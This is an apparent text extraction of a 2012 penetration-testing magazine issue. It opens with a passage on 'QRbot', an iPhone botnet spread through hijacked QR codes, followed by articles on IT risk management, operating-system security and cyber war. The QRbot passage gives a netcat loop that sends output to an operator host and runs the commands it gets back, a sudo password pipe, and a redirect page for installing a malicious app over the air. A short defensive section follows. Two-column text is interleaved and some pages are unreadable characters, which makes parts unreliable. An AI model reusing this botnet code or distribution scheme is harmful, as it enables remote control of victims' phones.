which is based on system calls. See the code below or as system command is almost impossible. In order
to understand the concept (not the complete source to get root in easier way, the password should remain
code): alpine and one of the following should be installed on
the iPhone device: OpenSSH or sudo. Important to
system(„echo ‘Started QRbot on iPhone by NirV ‘ > ~/result”); mention, most of the jailbroken iPhones have at least
while (1) { one of them or these can be installed as part of QRbot.
system(„cat ~/result | nc [operator_ip] 3333”); In this case, the attack vector is larger since there are
system(„nc [operator_ip] 3333 | head -n 1 | awk fewer actions that should be accomplished in order to
‘{system($0)}’ > ~/result”); get a root access. To make a long story short, if sudo
} is installed then the commands above can run with the
following command:
Note: not all system calls are supported on legal
devices, therefore the developer of the bot should echo ‘[password]’ | sudo -S [command]
consider to implement system commands in Objective
C, e.g. connect to the bot operator by using socket and If OpenSSH is installed, then reverse ssh tunnel is
listen to commands. probably a good solution – Google it.
Description: The 1st system call writes a banner to In conclusion, the functionality of the QR botnet
a file. The banner can include a general message or depends whether the iPhone is legal or jailbroken, and

THE BEST OF 01/2012 Page 130 http://pentestmag.com


this case, we post the bot on an Internet published IIS
web server, this installation type also known as over-
the-air (OTA) installation. Additional requirements:
static IP address and a DNS name (more reliable), an
XML manifest file (view configuration tasks on Apple’s
web site) and a developer account as single person
Figure 4. Botnet operator screen on application load or enterprise. The difference between single person to
enterprise is the amount of bots per server, meaning
if it is jailbroken, the installed applications should be that the enterprise account supplies unlimited number
abused. of endpoints (iPhone\iPdad). Since the deployment
method is explained in details on iOS Developer Library
Step 3b: Verify bot operation (Apple’s web site), the explanation of this step includes
After coding the logic into the application, some only the important details to make the distribution
testing should be done in order to verify that the bot work as part of the cyber attack. To accomplish the
is operating as we expected. In order to do the tests, attack, create the following HTML page and name it
run the server as explained in step 2 and run the default.html: Listing 1.
application using Xcode. It is recommended to run Another option is to run the script in a hidden IFRAME
first on iPhone Simulator. The first state of the botnet or on a blog, as there are many blogging platforms
operator should not contain any content, however available on the internet, most of which support and
after running the application, the terminal of the botnet provide easy means to set a blog up and running in a
operator should be as Figure 4, which means that the matter of minutes.
iPhone is connected. Note that the installation is based on ITMS (aka iTunes
Since the iPhone is connected and waiting for Music Store) protocol. Safari will use the link above in
commands, the botnet operator should write an iOS order to install the application. Important to mention is
system call, e.g. ping –c 4 www.google.com, where the –c 4 that the installation requires user’s approval, which will
means that only four requests are sent. A malicious bot be discussed in the next step.
should be running endless loop. The results should be
similar to the screenshot in Figure 5. Step 5: QRjacking & Scanjacking
The next step is to build an IPA file and test it on As explained before, social engineering is required in
the iPhone. If you have a developer account, then order to implement the attack. The first action should
you should know how to do this. If you don’t have a be QRjacking, which means that malicious QR should
developer account, please Google it. Note that some be replaced with the legal QR. However, it might be
of the commands that illustrated earlier might not work
on the real iPhone, therefore you need to code the Listing 1. QRjacking
features, e.g. file system access, socket etc.
<html>
Step 4: Publish QRbot on the web <head>
By this step we found a vulnerable QR reader and <title>QRbot</title>
created a bot and botnet operator. In order to install the </head>
bot, we need to use a legitimate distribution method. In <body>
<script type="text/javascript">
//Replace MALSITE.com with
your site
window.location="itms-
services://?action=download-
manifest&url=http:
//MALSITE.com/manifest.plist";
</script>
</body>
</html>

Figure 5. Control botnet remotely

THE BEST OF 01/2012 Page 131 http://pentestmag.com


PENTEST STARTERKIT
No automatic redirection
There are applications that do not redirect to web pages
automatically. I recommend testing each QR reader that
is downloaded to your iPhone. In order to perform the
test you may use the QR code from this article (which
may be QRjacked) or by generating a QR code to a
URL.

Figure 6. Citadel consulting web site Decode QR


There are many QR decoders; I use http://zxing.org/w/
more comfortable to go further and publish a cool decode.jspx to validate the data of the code. If you don’t
advertisement on TV. In order to QRjack, generate a know the web site to which you are being referred to, it
QR code (I use http://qrcode.kaywa.com/) and then is recommended to avoid scanning the QR code from
print it, for instance, the QR code in fig6 generates a the iPhone.
link to http://en.citadel.co.il/.
In reality, the link above should be redirected to Control over-the-air (OTA) installation
the html page from step 4. By entering the page, an OTA installation should be used when a specific
installation screen should appear, as illustrated in organization sends a link for installation. If the purpose
Figure 7. of a QR code is software installation, Apple’s App Store
So the real question is how to trick people to use this should do it, unless it is discussed in advance with the
code? The answer is in the question, they already did. publishing company.
People who scan the QR code are sure that the content
is authentic, or at least do not suspect it as malicious. Conclusion
QRbot is a concept of malicious software distribution
Avoidance and usage as botnet. In this article we have seen
As I explained in the beginning of the article, the QRbot that combining social engineering with cyber-crime
attack is based on both social engineering and cyber- might lead to DDoS attacks and confidential personal
crime techniques. The actions that should be taken in information leakage. The QR botnet is only a PoC,
order to avoid this kind attack are as follows: however it might be used since the implementation of
the attacks above is possible in short time. In order to
avoid the attacks, users should be more aware to the
risks and solutions for using secure QR readers and
verify applications’ installation sources.

NIR VALTMAN
Nir Valtman is employed in Citadel Consulting
LTD (http://en.citadel.co.il) as Chief Security
Architect. Before this position he was
working as senior technology consultant,
Application security consultant, system
security consultant and a technological
trainer. As part of his positions, he was not only consulting,
but also performed hands-on activities in various �elds, e.g.
hardening, penetration testing and development for personal\
internal applications. Nir has a BSc in computer science
but his knowledge is based mainly on cowboy learning and
information sharing with the techno-oriented communities.
As part of Nirs’ position, he is responsible to investigate new
technologies, delivery of high-level technologic surveys and
business development in the company. Visit his blog: http://
Figure 7. Installation con�rmation valtman-nir.blogspot.com or contact him: nirv@citadel.co.il.

THE BEST OF 01/2012 Page 132 http://pentestmag.com


������������������������
���������������������������
������

��� ������ ����


����������������������
� �����������������
�������������������������
� ���������������������������
��������������������������
������������������������������������������������
�������������������������������������������������
���������������������
�����������������������������������������������
������������������������������������������

����������������������������������������������������
���������������������������������������������������
����������������
����������������������������������������������������
��������������
��������
���������
����������
��������������

��������� ���������������������������������������� �������������������������������������������������������������������������������������������������������������������������

������������������������������� ���� ����� ������

��������������������������������
PENTEST STARTERKIT

IT Security
& Risk to data
– the ever changing landscape
“Data loss!”; “Industrial Espionage”; “Security Breach!” – Terms
which we’ve heard of before, but unfortunately are becoming
increasingly popular given the disturbing levels disclosed recently.
The new world of ‘Cyber Security’ is facing an increasing rise in
awareness across organisations as the risks associated to these
threats are realised.

T
here are many forms of security breaches taking of controls for your organisation. Organisations spend
various guises, and its because of this diverse hundreds of thousands having consultancies tell them
array of types of attack, that organisations are things that they probably already know all in the name
finding it challenging to protect themselves against. of compliance. They hand over a report, the client pays
On the other hand, clever countermeasures are the invoice and that’s it until the next quarter. There is
now available to help the fight against targeted or no doubt that there is value in having elements of your
opportunistic forms of attack. So that’s OK you might operations assessed by a third-party set of eyes, but it
say. However, these tools can be extremely costly is how you then use this information which is critical.
to buy, implement and then maintain. It is having a I’ve been lucky to work in both the private and
blended mix of effective countermeasures and an public sector in my career to date, and witnessed
effective risk management regime that organisations how organisations within these sectors have striking
seem to struggle with, which I will now discuss. similarities surrounding issues addressing IT Risk
The world of corporate governance has brought across the organisation. Many organisations I’ve
added pressure and cost to organisations safeguarding visited on my travels all understand risks to their day-
themselves against external (and not forgetting the to-day operations, but few understand how to integrate
internal) threats. Sarbanes Oxley, PCI, Solvency, the management of risk into their organisation
MiFID, (to name but a few) has forced organisations throughout.
to take a closer look at how they apply control over I have seen various approaches to managing risk,
their operations. Given the cost in the early days mainly dependant upon available budget and appetite.
of organisations having to comply with the likes of The private sector trend is to rely upon the results of
Sarbanes Oxley (running into tens of millions for a statutory audit to determine any exposure across
some larger FTSE based examples), organisations their IT landscape and to drive remediation. The public
are turning to various frameworks (COBiT, COSO sector has tighter controls surrounding their systems
etc) and standards as a way of applying control over (mainly for accreditation purposes) which requires them
their IT landscape. The problem comes when there to undertake health checks (vulnerability assessment)
is a misunderstanding between what the world of to again assess vulnerabilities which could compromise
compliance and governance state you must comply the security of their systems and data. Both though
with, and interpreting this as an appropriate baseline set have a common thread being that they have an external

THE BEST OF 01/2012 Page 134 http://pentestmag.com


review carried out and a report detailing the findings business representatives a window of opportunity to
delivered at the end of the work. be exposed to the health check process required for
It’s the lack of process following what happens with system accreditation purposes. They now had visibility
this report after it’s been delivered that seems to cause of the health check plan too which allowed them to
difficulties. Typically it’s sent for the attention of the IT budget for any remediation necessary. Moreover, it
Security Manager/CISO who probably had the task brought the business closer and allowed them to gain
of engaging and organising the external review in the an understanding around not just IT Security risks, but
first place. Whilst this seems a logical approach, there general IT risks to their critical systems and data.
is one party which is generally unaware of the work A consequence of the above, was a natural move to
that has probably taken place, who should have been manage IT security risks, that once would have gone
involved from the start – the business. unnoticed, onto various risk registers within the business
Given the recent downturn in the economy, there has and IT (for formal review) – to then feed into appropriate
been a changing shift (especially in the private sector IT strategies resulting by way of sparking process
with high-profile tabloid examples of compromised change (to introduce mitigating controls potentially) or
data loss) in the how organisations are approaching introducing technical changes to the system (Figure
managing risk. This is, in the main, driven by a reduction 1). This was crucial given the size of our estate (some
in budgets, e.g. IT Security now seeing vulnerabilities 1,700 servers) and not forgetting the varying degrees
identified from a vulnerability assessment/penetration of legacy equipment on the estate which was out of
test as being owned now by the system owners from support and was too old and out of date to simply apply
the business – and promptly throwing those issues over the latest security pack releases – thus, driving ways for
the wall for them to deal with (if they have budget to do us to look at the entire system and start thinking about
so) resulting in the risk remaining untreated. what mitigating controls existed, or, what mitigating
It is to this extent that the tone and accountability for controls could be introduced.
managing risk within an organisation must (and must A natural progression was to feed IT security
be seen to) come from the top. Management (and vulnerabilities that were deemed high-risk into trains
the Board) must embrace the need to understand risk of work concerning tech refresh programmes. These
and how it affects them, their organisations and also programmes addressed the risk of exposure of a
shareholders. I’m currently working within the public security breach to our operations by updating the
sector, and given the constraints I’ve already mentioned infrastructure where appropriate – thereby ensuring that
above, we’ve introduced a holistic approach to both risks residing upon the business or IT risk register were
business and IT risk across the organisation. deemed treated and closed.
Typically we receive a nice glossy report from the The task to achieve this was to engineer an effective
external health check company detailing our security method of raising the profile of security vulnerabilities
vulnerabilities in typical generic form.
What has failed to happen in the past is
the process of interpreting these industry-
good-practice, generic findings into
relevant risks pertinent to our organisation
and business. Instead we simply have
looked at what we can and can’t do for
various reasons. The vulnerabilities we
were not able to fix, for whatever reason
(cost v benefit), were simply left and
ignored. Security through obscurity – the
ostrich head in the sand.
A work stream was initiated to identify
Business System Owners (BSO’s) and
Technical System Owners across the
organisation. The aim here to bridge the
divide that had developed between the
business and IT. A formalised Health Check
process was introduced specifying the key
roles and accountability. This allowed the Figure 1. Our Stairway-to-heaven. 1General Computer Controls

THE BEST OF 01/2012 Page 135 http://pentestmag.com


PENTEST STARTERKIT
which could result in the organisation being Conclusion…
compromised, but ensuring that they are articulated So, a considered approach is required to the level
appropriately to the target audience. That was critical. of investment compared to the assessed risk to
IT Security seemed to have been deemed a thorn- your systems and data being compromised. Your
in-the-side for some time. Considered a dark arts assessment of risk should be a continuous, dynamic
practice by certain elements of the business. A topic process of collating, updating and analysing information
that most new very little about. This perception had to throughout it’s lifecycle. It is about how you approach
change. The introduction of the BSO’s and including the manner of governance and the oversight of your
them in the health-check process proved fruitful in IT function, including the level of interaction with
dissolving this. executive management, the Board and, not forgetting,
It seemed the norm that by having an IT framework your Internal Audit function regarding the results of
in place or by simply applying a standard was deemed monitoring activities and identified significant IT control
sufficient (whether that be COBiT for a wider view of the weaknesses to your organisation.
control across the IT landscape or even a build standard,
such as CIS, for a server build). The fact is this will only Summary…
get you so far on your journey – the secret is to introduce
a model that brings the business and IT elements of your • Increase in types and amount of cyber attacks on
operations closer together; to communicate effectively. organisations (see Times article by Iain Lobban,
To set company-wide appropriate policy (and then ask GCHQ [31st October 2011])
yourself how accessible is it? how is the awareness of • The volumes of data being held within companies
this managed?) is growing and therefore increasing the risk if
The secret, it seems, is to start to think-smarter compromised
as to how you and your organisation face up to the • Data is now being held in more complex systems
ever changing challenges you face in the world of which by their very own nature hold security
IT Security. With increased pressure to manage vulnerabilities which you may not be aware of
reduced budgets better, we are finding ourselves and could be easily exploited by an attacker if not
having to modify our internal processes surrounding properly controlled
the identification of risks; the management of, and • Instances where data is being manipulated outside
an appropriate and effective escalation process to of the main application e.g. spreadsheets (so lack
boot too. It’s about having an effective IT Assurance of control over data integrity)
function in place which has a holistic view across your • International Standards on Auditing (ISA’s) suggest
organisation which can protect your business and gaining more assurance by using CAAT’s methods,
lead to a reduction in your compliance costs through leading to an increased number of controls now
controls optimisation in response to both internal and being automated compared to manual
external threats. • Introduce an assurance function that has a holistic
Our IT systems are becoming increasingly more view across your IT landscape and the output of
complex too in an attempt to streamline our operations which is accessible by senior management
in the drive for efficiencies. Given this, organisations
are turning to automated techniques in order to combat
the threat to our data (e.g. introducing computer
aided auditing techniques to provide a greater degree
of assurance over the integrity of data across your
business critical systems, in an attempt to relieve
the admin burden that governance typically brings). CARL NIGHTINGALE
Furthermore, these off-the-shelf tools that are available Carl Nightingale is an IT Risk and Compliance practitioner
can be multipurpose. For example, you may have and educator in the �eld of IT risks and controls across the
installed ACL or IDEA to look at your data. This tool can, IT landscape. He started as a Programmer implementing IT
and has, been used to also assist with data migration systems all over the world, and then moved into the Financial
and conversion projects in addition to supporting your Services sector working for a Big-4 consultancy where he
statutory audit process too (general ledger scans focussed his attention on IT Controls and Governance.
for example), or to meet regulatory requirements to He currently provides a range of consulting, training and
exercise control over the referential integrity of your education support to help organisations and individuals with
data. the challenges of IT Risk and Controls.

THE BEST OF 01/2012 Page 136 http://pentestmag.com


Now Hiring

Teamwork

Innovation

Quality

Integrity

Passion

Sense of Security
Compliance, Protection
and

Sense of Security is an Australian based information security and risk management consulting
practice. From our offices in Sydney and Melbourne we deliver industry leading services and
research to our clients locally, nationally and internationally.

Since our inception in 2002, our company has performed tremendously well. We thrive on team
work, service excellence and leadership through research and innovation. We are seeking
talented people to join our team. If you are an experienced security consultant with a thorough
understanding of Networking, Operation Systems and Application Security, please apply with a
resume to careers@senseofsecurity.com.au and quote reference PTM-TS-12.

info@senseofsecurity.com.au
www.senseofsecurity.com.au
AUDITING & STANDARDS PENTEST

Operating System
Security Re-visited
Information security, in terms of the risk management of electronic
information, is a young and relatively new practice in the business
world. Information security departments are less than a decade
old in many businesses. The mid-to-early 90s saw the wider scale
adoption of the public Internet, and along with it came technical
gurus (some would say “hackers”) who professed to know how to
keep bad guys out of good guys’ corporate networks.

T
he earliest face of information technology security Many in the field of information security wouldn’t
expertise was one of hackers and small service care to admit it, but whenever the bad guys target the
providers. Businesses at this time did not have good guys with (among others) intentions of corporate
dedicated security departments. The information security espionage, intellectual property theft, and / or theft
practice was handled by IT operations typically. IT of personal information, they are rarely met with any
operations staff would install a firewall, configure it badly significant resistance.
(in most cases) and they would roll out some sort of a Way back in the early 2000s, with the outbreak of
token gesture in the way of malware protection (although the famous worms known as Nimda and Code Red (ah
it seems the effectiveness of malware protection controls those were the days!), dropped packet logs from our
are limited by the products available in this space – and firewall revealed that worm propagation connections
so how advanced can it possibly be as of January were attempted to our corporate network from some
2012?). This was the earliest incarnation of information famous names, including IBM, Oracle, and many other
security where it concerned the preservation of the Wall Street favorites. Corporate networks were being
confidentiality, integrity, and availability of information routinely infected across the globe.
assets and services (yes – I got my CISSP too, although These days the malware is less noisy, but even
it was 2005 – seemingly a lifetime ago). more pervasive, and there is more of an economic
In the decade-plus since the world first realized that it element behind it. Botnets are common, consisting of
might need to think about the protection of information many thousands or millions of nodes, and corporates
assets held in electronic form, has there been much are unknowingly assisting the efforts of the botnet
progress in the field? Major information security incidents architects. Without permanently online corporate
regularly make the headlines even in business-related desktop PCs and Microsoft Windows (predominantly)
publications such as the UK’s Financial Times. In the servers, the botnets would not be so effective and
early to mid-2000s, the frequency of reported security widespread. Botnets are rented out for any parties
incidents was, to say the least – very low. So when I wishing to spam, loot, hoard, or whatever it is the bad
was proclaiming at the time that corporate networks guys do to make money. Sufficed to say, when the
were wide open, my comments were greeted with some botnet propagates, it does not discriminate based on
skepticism, sideways glances, and other expressions of the ownership of the real estate within which it decides
derision, disapproval or discomfort. to squat.

THE BEST OF 01/2012 Page 138 http://pentestmag.com


There are many other aspects of information To keep the bad guys at bay, or at least avert a
security incidents that serve to illustrate the plight situation where the business is a “low hanging fruit”,
of the information security industry, and therefore deep knowledge of the technical infrastructure (and
also its customers, and therefore also our economic the technical risks to the business) is required, and
security. One could discuss the proof ad infinitum therefore also diverse technical skills are required.
of the negative progress of the information security It takes a wolf to catch a wolf. The information
industry. Security Analyst must be a wolf. Between the members
We could feel perhaps marginally better about our of the information security department, they need to
beloved industry if we could honestly claim that the know core technologies in depth (Unix, Cisco, Oracle,
field of information security is still young and therefore Windows…et cetera), penetration testing, application
in an early state of evolution. In the Darwinian sense of security testing, and they need to understand how
the word, the claim that security is evolving implies it the pieces of the puzzle fit together from a security
is adapting to its environment and improving with time. perspective.
However, I have seen little to suggest that the industry But the ground level skills are not enough. We can
is evolving. have some of the best Hackers at our disposal –
Some have said that information security is broken. effectively artists in the field. But artists generally have
Well, to be quite frank, as of early 2012, the industry is a manager or agent who sells their work on their behalf.
certainly not in a state of evolution. Things have been The artist’s agent is the I/O interface between them and
in regression since the early 2000s. Therefore we can the outside world.
safely say that the industry is indeed broken. Late 90s Hackers carried with them unconventional
(not the norm for business environments) traits of
The Story Behind Our Decline language, appearance (every day was a more-casual-
The reasons for the failure of the information security than-casual Friday), and, from the point of view of the
industry are covered in some depth in my book of management, a general lack of aesthetic appeal. They
the title Security De-engineering, but just to cover also needed an agent who sat between themselves
them briefly here seems appropriate because it sets a and the rest of the company. In essence they needed
framework for the discussion about the importance of an effective Security Manager who had themselves
operating system security controls. some hands on experience in the industry: someone
The underlying reason for our descent into chaos who could speak Hackerish, walk the walk, and talk the
is a lack of the appropriate skills, primarily at the talk of both sides of the fence. An effective leader was
security management level, which in turns leads to the needed who carried mutual respect between manager
development of a skills gap at the operational / Security and cohorts. Instead, what existed were managers who
Analyst level. in many cases did not even have any IT experience,
I use the term Hackers here (with an upper case H) let alone security experience. Such managers were
not in any kind of ethical framework. We should not talk limited in their capacity and could really only serve as
about ethics in security because we are not the law. We dictators rather than leaders. The days of the Hacker
should not pass judgment or paint IT enthusiasts in a were numbered.
negative light just because they have spoken at a Black So, what we had in the good old days was the right
Hat event (for example). We need to let the law do the type of skills but the wrong type of management.
judgment. Until proven guilty, Hackers are good guys. Several consequences emerged from this unfortunate
What is an ethical hacker? A penetration tester who… circumstance: Hackers were seen as unmanageable
doesn’t do bad stuff? in some cases. In others their presence caused some
In the late 90s, the information security industry was issues with insecurity. For many different reasons, none
a place for Hackers and IT enthusiasts with a deep of them good, Hackers were cast aside. Today, very few
passion for their field. The Hackers, very much in the remain in the industry apart from a few government-
mold cast in the Steven Levy book of the same name, funded niches.
lived and breathed programming (creativity), reverse Primarily then, our problems in information security
engineering, spoofing, poisoning, eavesdropping, have stemmed from the removal of key areas of
hijacking and various other activities with hyperbolic intellectual capital from the industry. From this root
(what were we saying about ethics before?) names. cause, a whole host of other macro-scale problems
Nobody knows everything there is to know in information have emerged, which are covered in detail in my book
security, but the hackers, including many that I worked Security De-engineering, but the area I want to focus on
with, came fairly close to it! within the scope of this article is the area of Operating

THE BEST OF 01/2012 Page 139 http://pentestmag.com


AUDITING & STANDARDS PENTEST
System security, within the world of risk assessment options, such as file system permissions, that allow
and there is a connection with penetration testing and administrators to apply some level of protection to
vulnerability management in general. information (files, databases, etc) hosted by the
computer. Operating system security relates to the
Terminology: What Is Meant By Operating degree to which available controls have been applied,
System Security? in the face of remote and local exploit risks.
First up, what is meant by Operating System? The
usual meaning in most businesses’ operational A Brief History of Vulnerability Assessment
sense is a bare install – in other words, the box as The year is now 2012. As I mentioned earlier, the
in its shipped state, with no in-house or any other information security scene did not emerge until the
applications installed – there will [hopefully!] be mid-90s. So we are in an industry that approaching
nothing installed on the computer other than what is 20 years old. We’re still teenagers but most teenagers
made available from the vendor’s install media. This at least have developed the ability to tie their own
is different from most university Computer Science shoelaces.
course syllabus definitions of the phrase, but we will Security assessment of networks and devices kicked
go with the former definition. off with penetration testing delivered by security service
Practicing information security professionals will providers. The earlier penetration tests were in the
doubtless have come across situations where tensions most part delivered by highly competent individuals.
rise in meetings as a result of the classic conflict of A common scenario was for four analysts to carry a
terminologies. Personally I encountered this situation remote test for a period of two weeks or so.
many times: two or more security pros, each carrying Back in the mid-to-late 90s, firewalls were poorly
heavy baggage in the way of ego and pride, read configured if they even existed at all, and some even
different books on the same subject matter. Each exhibited some cute bugs such as the infamous
book describes the issues in a different way and uses Checkpoint Firewall-1 vulnerability, whereby scanning
different terms and phrases. The budding security pro with our source port set to UDP 53 resulted in a bypass
invests a great deal into taking on board their version of of the firewall rule set (this issue wasn’t confined to
the story, and if others use different phrases than their Checkpoint’s firewall). Of course the vendor fixed this
own, so help them, they’re in trouble. To be honest this issue many years ago.
usually occurs at the security management end of the So penetration tests usually revealed a whole plethora
scale. For example, a buzzword which was created in of critical issues and so penetration testing was seen by
the mid-2000s was governance. This phrase has for the business world as carrying some value. Penetration
some years been taken in different lights by different testing as a service grew in popularity at a rapid rate up
people, and in security we do not have universally until approximately 2001 when the industry started off
accepted terms and phrases. Everybody’s version is on its decline at a fairly rapid rate.
the correct version so it seems. One of the few aspects of security that did improve
More recently another phrase – Advanced Persistent from the late 90s to this day was the configuration
Threat – took on viral usage globally, even though many of firewalls, although it should be said that in larger
of the attacks categorized under the APT umbrella have businesses it’s not Security Analysts who decide on a
no persistent element, and for that matter many of them rule set – usually it’s IT operations, and in many SMEs
are not so advanced either (e.g. user follows a malicious the firewall is remotely managed by a Managed Service
link, installs what they think is anti-virus software, but is Provider (MSP). With the improvement in firewall rules,
actually software that harvests their personal details the number of findings in penetration tests was reduced,
through a nice encrypted tunnel). and so the perceived value of penetration testing was
At the technical, business end of the security scale, also reduced.
we do not have so many confusing terms and phrases. Also around the end of the 90s, automated
Textbook definitions of TCP/IP for example: this is not vulnerability scanners began their ascent on the security
subject to misinterpretation, or at least we can say that world. Automated vulnerability scanners are those such
there is a fairly consistent meaning across the globe. as Nessus and so on that supposedly allow a novice
At the most base level we can say that TCP/IP is a analyst to enter a few target IP addresses, configure a
language invented for the purpose of enabling network- default scan, and hey presto, as if my magic, one has
connected devices to talk to each other. conducted a penetration test!
So what of operating system security then? Computer The perception at the time, and still very much to this
operating systems are designed with configuration day, was that these automated scanners could actually

THE BEST OF 01/2012 Page 140 http://pentestmag.com


replace a manual penetration test and produce results Why Analyze OS Security Controls?
of similar value. The costs were very different – the There is nothing really revolutionary or ground breaking
misconception at the time was that any analyst could in these ideas about OS and database configurations
use an auto-scanner, so why should the business fork in security. Vulnerability management product vendors
out 40,000 USD for a manual test? It was clear the end caught onto the idea some years ago, but failed to
was nigh for a large chunk of the penetration testing implement anything really comprehensive and useful
market. for their customers. Furthermore, from what I have
The fact is that automated scanners carry some value, seen in my global travels as a consultant with a roving
but realistically it is little more than what can be gained disposition, very few businesses invest resources in
with a simple port scan. Most of the tests are based this area, and very few security professionals seem
purely on guesswork. The tool grabs a banner (such to understand the importance of this area. It is rarely
as a web service that says I’m running Apache 2.2.16), the case that businesses do absolutely nothing to
then looks up in its list of vulnerabilities for anything mitigate risk (they at least understand that installing
Apache-related that matches a version number less security patches and applying strong passwords is
than or equal to the target service version. worth some thought), but in all but a few cases their
Automated vulnerability scanners produce an awful lot efforts are insufficient given their respective financial
of output, most of which is false positives, but needs to risk profiles.
be analyzed nonetheless. So there is some analysis to Taking a simple example to illustrate what we mean
be done. The creation of the scanners did not completely by OS controls: for a Unix system, a classic local
remove the need for human / manual analysis – and in privilege escalation vector is one where administrators
fact given the sheer volume of output from these tools, left a dot (“.”) character in the $PATH environment
the time requirement is far from negligible. variable, thereby leading to a situation where the
Overall: automated vulnerability scanners are not original binary executable could be replaced by a
exactly useless but they’re not far from it. The tool malicious version (e.g. a system administrator uses
developers never claimed that their scanners were the the directory list command ls – but the ls program
best thing since sliced bread – it was the marketing has been replaced by a malicious version that sets an
engine behind the commercialization of open source empty root password).
tools that set expectations too high. There is the matter of corporate information security
So then fast-forward to 2012 – it does seem that standards also. When a business creates a security
the industry thinking (or lack of) behind vulnerability standard for a specific technology, such as Cisco IOS
assessment never really shifted at all. There is a growing for example, they are effectively laying down the law
awareness of the ineffectiveness of automated tools, on how operating systems on Cisco devices should be
but the over-riding opinion is that current automation configured from a security perspective.
solutions are just fine. The vast majority of businesses So with regard the subsection heading Why Analyze
base their entire vulnerability management strategy on OS Security Controls, there are two categories of
the use of such tools. answer to this question. The first goes something like
During all this time, what has been the industry because we have perfectly fine security standards,
perception of operating system security? Well, to be signed off by our CEO, that tells us we need to analyze
honest, there haven’t really been any serious efforts security controls. The second type of answer is related
by the industry to go down the road of the assessment to technical risk and the efficiency of our vulnerability
of OS controls with regard security. A few scripts were management programs – and this is the subject of the
knocked up in the 90s, such as Satan, but to date there remainder of this article.
hasn’t been an effort to develop a comprehensive In the bigger picture of vulnerability assessment,
solution in this space. The Hackers were aware of the there is case for remote penetration testing by a
importance and value of doing things “from the inside trusted third party (one that has no prior knowledge of
out”, but the whole area was seen as being too tedious the target network) where the skills of the testers are
to even mention. Then, the Hackers were gone – so the at a very high level, and the test carries no restrictions.
message about OS controls never went mainstream in However the penetration test should not be seen as a
the industry. panacea. In a scenario where internal IT staff, including
The information security vinyl was released in 1995, security personnel, do not have intimate knowledge
but the record player needle got stuck in 2002. The of the IT landscape, the two-week penetration test
needle has been stuck ever since. The industry needs costing 40K USD will barely touch the surface. The
a fairly hefty nudge. gap in knowledge will be filled slightly by a penetration

THE BEST OF 01/2012 Page 141 http://pentestmag.com


AUDITING & STANDARDS PENTEST
test, but the only scenario where a penetration test penetration test inside out. The approach is I have
can be valuable is one where both target staff and compromised the target, now how I would I compromise
penetration testers are highly experienced in their the target? Using a root / administrative account allows
field. In this case the 40K USD, 40 man-day test is a vastly more efficient situation where a great deal more
used to try and spot misconfigurations that the internal can be learned about a system in a short period of time
staff may have missed. This is a good use of funds in as compared with a remote penetration test.
most cases. Any other scenario is unlikely to provide I mentioned previously about the new perimeter
much value for businesses. In summary, penetration in corporate networks – the perimeter is now critical
testing is not the answer for businesses. infrastructure. Many businesses do not have internal
We have heard a great deal about APT in recent segmentation. There is only a DMZ subnet and then
months. APT has been attributed with many of the a flat internal private network with no further network
recent high profile attacks. Malware is released at rates access control. But assuming that they do have internal
faster than the anti-virus software vendors can release network access control, then we can imagine that the new
pattern updates. Ever more ingenious malware is being perimeter is the firewall between workstation subnets and
created by the bucket-load. Then there is the problem critical servers such as database servers and so on. The
of unaware users. Regardless of whatever awareness internal firewall(s) makes up the perimeter along with…
program or punishment businesses deal out, there will you got it…the operating system of the database, LDAP,
always be some user somewhere who clicks on some AD, and other critical application hosts [penny drops].
click they shouldn’t follow, and corporate policies that Businesses can proportion the resources deployed
disable Javascript or blacklist URLs are doomed to in operating system control security assessment
failure. depending on the criticality of the device. The criticality
Overall…the perimeter has shifted. The perimeter is will depend on a number of factors, not least network
no longer the perimeter if you see what I mean, in that it architecture. In the case of a flat private network with
is no longer the border or choke point external firewalls. no internal segmentation, effectively every device is
Bad guys own the businesses’ workstation subnets. a critical device and the budget required for security
Many of the attacks are carried out with undisclosed is going to be much higher than in the case where
vulnerabilities and because they are undisclosed to segments exist at differing levels of business criticality.
the public, there is no patch available to mitigate the Hopefully then the importance of operating system
software vulnerability. This is the point where many and database security controls has been made clearer.
analysts raise a white flag. But this is also the point Thoughtful deployment of automated and manual
where OS controls can save the day in many cases. analysis in this area is a nice efficient use of corporate
At least we can say that thoughtful use of OS security resources with huge returns in risk mitigation. The
controls can prevent a business from becoming a low longer terms costs of information risk management will
hanging fruit. be less where better targeting of resources is deployed
Taking a Unix system as an example: an attacker may – and certainly, some of the suggestions for vulnerability
have remotely compromised a listening service but they assessment I have outlined in this article can help
only gain the privileges of the listening service process a great deal in reducing the costs of vulnerability
owner. In most cases this is not a root compromise. management for businesses.
The attacker will need to elevate their local privileges in
most cases. How do they do this? They look for bad file IAN TIBBLE
system permissions and anything running under root Ian Tibble is currently the Chief Technical Officer and Founder
privileges. They look for anything related to the root of Seven Stones Information Security (http://www.seven-
account, such as cron jobs owned by lower privileged stones.biz), and author of Security De-engineering (Taylor-
users that were configured to run under root’s cron. Francis, December 2011).
With effective controls on server operating systems Ian was an IT Specialist with IBM Global Services before entering
we have the possibility to severely restrict privilege into the dedicated security arena. Ian 11 years experience in
escalation opportunities, even in cases where zero- Information Security has been with both service providers:
day/undisclosed vulnerabilities are used by attackers. Trusecure (now Verizon), and PricewaterhouseCoopers, and
Some services can even be chroot jail configured, but also their customers, in logistics, banking, and insurance. Ian
this requires knowledge of under the hood operating has been engaged on projects with 95 Fortune 500 companies
system controls. and banking / �nance houses around Asia (Indonesia,
So think of the analysis of operating system controls Singapore, Malaysia, Taiwan, Hong Kong, and Australia), and
as a kind of a twist on a penetration test – sort of a Europe (UK and Czech Republic).

THE BEST OF 01/2012 Page 142 http://pentestmag.com


���������
������������������
��������������������
�������������� �������������
������������

������������
�������

� � � � � � � � �
�� �����������������
���� ������������������������������������
������ �����������������
�������� ���������
����������������������
���������������������
� ����������������
�� ��������������������� ����������������������������� ������������
AUDITING & STANDARDS PENTEST

Separating
Fact from Fiction – The realities of Cyber War

Cyber War. Two words that you’ll have heard in the news a few
times by now. You’ll have heard it more and more over the last
year or so. Maybe two or three years if you’ve been halfway
interested or happened to be browsing on IT websites that cover
cyber warfare. Especially if you’re living in the US, you’ll have heard
some pretty fear-inducing stories.

A
nd not by just anybody; Richard Clarke himself this; up till STUXNET only the experts knew and realized
has said that a Cyber War is the next big threat to that an attack on such systems could cripple us.
national security. He was, of course, referring to
the national security of the US, but his critique certainly So what is Cyber Warfare?
holds water for other modernized nations. What may be For a very broad definition of Cyber Warfare, I will steal
surprising is that he was absolutely right, even though a bit from Wikipedia’s entry on Aerial Warfare: Cyber
he may be understood poorly. Warfare is the use of both military and other computer
